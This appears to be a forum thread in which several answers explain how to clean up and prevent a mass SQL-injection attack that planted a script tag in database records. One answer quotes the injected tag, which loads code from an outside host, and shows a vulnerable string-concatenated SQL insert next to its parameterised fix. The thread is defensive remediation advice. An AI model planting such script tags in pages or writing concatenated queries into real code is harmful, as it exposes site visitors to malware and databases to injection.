Deciphering this XSS attack [closed]

Answer 1

Just happened to us as well. Almost every record in the database.

The best bet is to do the following: (we have just done this successfully)

UPDATE [mytable] set [column] =
  REPLACE([column],
          '</title><script src=http://google-stats50.info/ur.php>',
          '')

That line will remove the script from each field. You will have to manually check the fields though and change the UPDATE statement to suit.

---

I am taking a guess that every one of you has a form on your website with a submit button. I am also guessing that the forms action involves a sql statement with concatenated sql?

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \
                           name & "', '" & email & "', '" & enquiry & "');"

If this is the case, you got SQL injection hacked and you should probably change all statements that use this syntax to "parameterised queries"

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"

sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz

Hopefully this helps..

Answer 2

I've fixed a similar hack recently, every .asp, .js and .html file on the infected server had an extra script included, but the database was normal. In that case the hack was done via FTP, the password was not strong enough. Maybe something similar happened to you?

I've fixed it with a find-and-replace-all in a text-editor supporting multiple documents at once. (notepad++)

Answer 3

Classic XSS attack. You should be checking your inputs for HTML tags and removing them. If you are allowing people to post HTML tags then you should use a whitelist for allowed tags (and allowed tag attributes, so they can't do "onClick", for example) rather than trying to block ones you can think of that might cause trouble.

Answer 4

We got the same problem this morning. classic case of sql injection: you don't seem to check the parameters you got via URL. take a look to the webserver access logs - you will see update statements!